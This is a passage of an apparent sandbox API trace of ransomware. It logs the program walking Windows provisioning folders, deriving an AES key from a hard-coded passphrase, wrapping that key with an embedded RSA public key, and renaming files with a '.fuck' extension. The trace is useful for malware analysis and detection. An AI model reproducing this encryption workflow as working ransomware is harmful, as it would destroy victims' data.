dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.912] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bee18, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be4d8) returned 1 [0239.912] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.912] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.912] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d66e0) returned 1 [0239.913] CryptImportPublicKeyInfo (in: hCryptProv=0x28d66e0, dwCertEncodingType=0x1, pInfo=0x28c8d78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8da8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8db0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be518) returned 1 [0239.913] CryptEncrypt (in: hKey=0x28be518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.913] CryptEncrypt (in: hKey=0x28be518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6ba8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d6ba8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6ba8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.913] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.913] CryptEncrypt (in: hKey=0x28be4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.913] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.913] CloseHandle (hObject=0xffffffff) returned 1 [0239.913] CloseHandle (hObject=0xffffffff) returned 1 [0239.913] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), bFailIfExists=0) returned 0 [0239.914] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0239.914] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg")) returned 0 [0239.915] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.fuck")) returned 0 [0239.915] CryptDestroyHash (hHash=0x28bee18) returned 1 [0239.915] CryptDestroyKey (hKey=0x28be4d8) returned 1 [0239.915] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.915] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.915] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.915] GetLastError () returned 0x5 [0239.915] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml")) returned 0x20 [0239.916] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0239.916] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.916] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.917] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.918] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0239.920] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.920] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.920] CryptHashData (hHash=0x28bf218, pbData=0x28573d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.920] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be358) returned 1 [0239.920] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.920] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.920] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d62a0) returned 1 [0239.921] CryptImportPublicKeyInfo (in: hCryptProv=0x28d62a0, dwCertEncodingType=0x1, pInfo=0x28c98d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9908*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9910*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be5d8) returned 1 [0239.921] CryptEncrypt (in: hKey=0x28be5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.921] CryptEncrypt (in: hKey=0x28be5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6a98*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d6a98*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6a98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.921] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.921] CryptEncrypt (in: hKey=0x28be358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.921] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.921] CloseHandle (hObject=0xffffffff) returned 1 [0239.921] CloseHandle (hObject=0xffffffff) returned 1 [0239.922] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0239.922] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0239.922] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.gsg")) returned 0 [0239.923] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.fuck")) returned 0 [0239.923] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.923] CryptDestroyKey (hKey=0x28be358) returned 1 [0239.924] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.924] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.924] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bee18 [0239.924] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.924] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.924] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bf218 [0239.924] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.924] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.924] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.924] GetLastError () returned 0x5 [0239.924] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0239.925] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0239.925] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.926] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.926] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0239.926] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d6878) returned 1 [0239.929] CryptCreateHash (in: hProv=0x28d6878, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.929] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.929] CryptHashData (hHash=0x28be358, pbData=0x2857358, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.929] CryptDeriveKey (in: hProv=0x28d6878, Algid=0x6610, hBaseData=0x28be358, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be658) returned 1 [0239.930] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.930] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.930] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d5dd8) returned 1 [0239.931] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5dd8, dwCertEncodingType=0x1, pInfo=0x28c9a78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9aa8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9ab0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28bea18) returned 1 [0239.931] CryptEncrypt (in: hKey=0x28bea18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.931] CryptEncrypt (in: hKey=0x28bea18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5e60*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d5e60*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5e60, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.931] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.931] CryptEncrypt (in: hKey=0x28be658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.931] CloseHandle (hObject=0xffffffff) returned 1 [0239.931] CloseHandle (hObject=0xffffffff) returned 1 [0239.931] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0239.932] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0239.933] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0239.934] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0239.934] CryptDestroyHash (hHash=0x28be358) returned 1 [0239.934] CryptDestroyKey (hKey=0x28be658) returned 1 [0239.934] CryptReleaseContext (hProv=0x28d6878, dwFlags=0x0) returned 1 [0239.934] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.935] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.935] GetLastError () returned 0x5 [0239.935] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0239.935] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0239.935] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.936] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.936] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0239.937] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d6878) returned 1 [0239.939] CryptCreateHash (in: hProv=0x28d6878, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.940] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.940] CryptHashData (hHash=0x28be998, pbData=0x2857358, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.940] CryptDeriveKey (in: hProv=0x28d6878, Algid=0x6610, hBaseData=0x28be998, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be858) returned 1 [0239.940] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.940] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.940] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d6190) returned 1 [0239.940] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6190, dwCertEncodingType=0x1, pInfo=0x28c9e88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9eb8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9ec0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be3d8) returned 1 [0239.940] CryptEncrypt (in: hKey=0x28be3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.941] CryptEncrypt (in: hKey=0x28be3d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6d40*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d6d40*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6d40, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, 